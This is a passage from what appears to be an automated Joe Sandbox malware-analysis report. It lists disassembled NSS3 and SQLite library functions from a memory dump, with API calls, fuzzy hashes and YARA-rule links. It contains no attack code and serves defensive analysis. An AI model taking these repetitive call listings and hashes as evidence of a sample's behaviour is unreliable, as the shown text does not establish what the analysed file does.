                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 308106B1A006019BEB109F34DC49AABB7EABF5534CF144529E86487B41FB31E81AC7E5
                                                                                                                                                                                                                                                                                          Function 6C70DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: DeleteCriticalSection.KERNEL32(D958E852,6C711397,5B5F5EC0,?,?,6C70B1EE,2404110F,?,?), ref: 6C70AB3C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: free.MOZGLUE(D958E836,?,6C70B1EE,2404110F,?,?), ref: 6C70AB49
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: DeleteCriticalSection.KERNEL32(5D5E6C90), ref: 6C70AB5C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: free.MOZGLUE(5D5E6C84), ref: 6C70AB63
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C70AB6F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C70AB76
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C70DCFA
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C70DD0E
                                                                                                                                                                                                                                                                                          • PK11_IsFriendly.NSS3(?), ref: 6C70DD73
                                                                                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C70DD8B
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C70DE81
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C70DEA6
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C70DF08
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 519503562-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4af7c62884d6a50aab221e4804b94dbb0f47d08a4b528b1bf6612332499602f9
                                                                                                                                                                                                                                                                                          • Instruction ID: b6c2607ca6d23a77878dda0caa6302c04cb2e13d9fe735bad95cb94682f37667
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4af7c62884d6a50aab221e4804b94dbb0f47d08a4b528b1bf6612332499602f9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F791C2F5B002059FDB00DF68CA89BAAB7F5BF64308F148039D8199BB42E731E945CB95
                                                                                                                                                                                                                                                                                          Function 6C6C5FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C7ABB62,00000004,6C814CA4,?,?,00000000,?,?,6C6831DB), ref: 6C6C60AB
                                                                                                                                                                                                                                                                                          • sqlite3_config.NSS3(00000004,6C814CA4,6C7ABB62,00000004,6C814CA4,?,?,00000000,?,?,6C6831DB), ref: 6C6C60EB
                                                                                                                                                                                                                                                                                          • sqlite3_config.NSS3(00000012,6C814CC4,?,?,6C7ABB62,00000004,6C814CA4,?,?,00000000,?,?,6C6831DB), ref: 6C6C6122
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C6C60A4
                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6C6095
                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C6C609F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_config$sqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
                                                                                                                                                                                                                                                                                          • API String ID: 1634735548-648709467
                                                                                                                                                                                                                                                                                          • Opcode ID: c70c3be8c4256db10caaccd9e32744b5e669822517c248a896c2f42fff371db4
                                                                                                                                                                                                                                                                                          • Instruction ID: e05bc2cad13c01d3b4855b4e9a0adc88211d4412c33ec22be89dd3d29601fd4a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c70c3be8c4256db10caaccd9e32744b5e669822517c248a896c2f42fff371db4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEB13F74F0464ACFCB14CF58C2409A9F7F0FB1E30DB158169D519AB762E731AA84CB9A
                                                                                                                                                                                                                                                                                          Function 6C674F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C674FC4
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6751BB
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C6751B4
                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6751A5
                                                                                                                                                                                                                                                                                          • unable to delete/modify user-function due to active statements, xrefs: 6C6751DF
                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C6751AF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_logstrlen
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                                                                                          • API String ID: 3619038524-4115156624
                                                                                                                                                                                                                                                                                          • Opcode ID: 1a2915d882e2f7b327f29070e2e80ff750ba1f9ac0f35e6b66ab004722af39c9
                                                                                                                                                                                                                                                                                          • Instruction ID: 7073fa03e2a087995dcd5fce3ccf4e4bc6f96c8c38dc926231c59543c6b78d04
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a2915d882e2f7b327f29070e2e80ff750ba1f9ac0f35e6b66ab004722af39c9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2371BD71A0420A9BDB10CE25CD84BEA77B9BF48308F144964FD199BB81D335E854CBA5
                                                                                                                                                                                                                                                                                          Function 6C6E2D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __allrem
                                                                                                                                                                                                                                                                                          • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                                                                                                                                                                          • API String ID: 2933888876-3221253098
                                                                                                                                                                                                                                                                                          • Opcode ID: a504abd67498f8a0ffbe04abc5a121fdb9ba4a776b0dfc8af785a0ecbafec68f
                                                                                                                                                                                                                                                                                          • Instruction ID: e6340b8d91afe0b55dbca599666ecc996423678266e5a4a595219c387b6a7ce2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a504abd67498f8a0ffbe04abc5a121fdb9ba4a776b0dfc8af785a0ecbafec68f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B761C571B012159FDB54CF64DC88AAA77B2FF8D318F108139E9099B780EB31AD06CB95
                                                                                                                                                                                                                                                                                          Function 6C75FF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C75F165,?), ref: 6C75FF4B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C75F165,?), ref: 6C75FF6F
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C75F165,?), ref: 6C75FF81
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C75F165,?), ref: 6C75FF8D
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C75F165,?), ref: 6C75FFA3
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C75F165,6C82219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C75FFC8
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C75F165,?), ref: 6C7600A6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 204871323-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f9b295fb4329f615a2bc0882e8b0e9b7b814a12eb941b850c1a83a461db93713
                                                                                                                                                                                                                                                                                          • Instruction ID: 258b0ecb1cb30ab9732ea572b52ef3fa1bc01eaa4fcd7eb3a257a87ee49146c3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9b295fb4329f615a2bc0882e8b0e9b7b814a12eb941b850c1a83a461db93713
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37511571E042559FDB108E5ACA807AEB7B5FB49318F680239DC99A7F40D732AC10CBD4
                                                                                                                                                                                                                                                                                          Function 6C71DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C71DF37
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C71DF4B
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C71DF96
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C71E02B
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C71E07E
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C71E090
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C71E0AF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Error$Unlock$CriticalEnterSectionValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4073542275-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0d0c7d3c66d64e0c57ce36766902312a2beeea1e35d804bfb539696596406223
                                                                                                                                                                                                                                                                                          • Instruction ID: 23adcfd19e622fbfab71f3edf4b5471a49cace97173fe9d9af760134ea8e39c6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d0c7d3c66d64e0c57ce36766902312a2beeea1e35d804bfb539696596406223
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E251C131A086048FDB219F24DA48B6773B5FF54318F284539E8AA47F91E735E948CBD2
                                                                                                                                                                                                                                                                                          Function 6C71BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C71BD1E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C6F2F0A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6F2F1D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7357D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C6FB41E,00000000,00000000,?,00000000,?,6C6FB41E,00000000,00000000,00000001,?), ref: 6C7357E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7357D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C735843
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C71BD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FAB0: free.MOZGLUE(?,-00000001,?,?,6C6EF673,00000000,00000000), ref: 6C74FAC7
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6C71BD9B
                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C71BDA9
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C71BE3A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F3EC2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6F3ED6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6F3EEE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C6F3F02
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: PL_FreeArenaPool.NSS3 ref: 6C6F3F14
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6F3F27
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C71BE52
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C6F2CDA,?,00000000), ref: 6C6F2E1E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C6F2E33
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: TlsGetValue.KERNEL32 ref: 6C6F2E4E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: EnterCriticalSection.KERNEL32(?), ref: 6C6F2E5E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: PL_HashTableLookup.NSS3(?), ref: 6C6F2E71
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: PL_HashTableRemove.NSS3(?), ref: 6C6F2E84
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C6F2E96
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: PR_Unlock.NSS3 ref: 6C6F2EA9
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C71BE61
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2178860483-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e31a16fcf0316d45179632a96450a0ee17ccfaa98a34d5f0c9b5543d2a3dda5f
                                                                                                                                                                                                                                                                                          • Instruction ID: 4adebb1c00f39afca8385055f58300e7b7f0414819ed453b87bbf6690fdefd03
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e31a16fcf0316d45179632a96450a0ee17ccfaa98a34d5f0c9b5543d2a3dda5f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C4114B5A04210AFC710DF28DE89A6A77E9EF49718F148068F95897B11E731E808CB92
                                                                                                                                                                                                                                                                                          Function 6C73AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C73AB3E,?,?,?), ref: 6C73AC35
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C71CF16
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C73AB3E,?,?,?), ref: 6C73AC55
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C73AB3E,?,?), ref: 6C73AC70
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71E300: TlsGetValue.KERNEL32 ref: 6C71E33C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71E300: EnterCriticalSection.KERNEL32(?), ref: 6C71E350
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71E300: PR_Unlock.NSS3(?), ref: 6C71E5BC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C71E5CA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71E300: TlsGetValue.KERNEL32 ref: 6C71E5F2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71E300: EnterCriticalSection.KERNEL32(?), ref: 6C71E606
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71E300: PORT_Alloc_Util.NSS3(?), ref: 6C71E613
                                                                                                                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C73AC92
                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C73AB3E), ref: 6C73ACD7
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C73AD10
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C73AD2B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71F360: TlsGetValue.KERNEL32(00000000,?,6C73A904,?), ref: 6C71F38B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71F360: EnterCriticalSection.KERNEL32(?,?,?,6C73A904,?), ref: 6C71F3A0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71F360: PR_Unlock.NSS3(?,?,?,?,6C73A904,?), ref: 6C71F3D3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
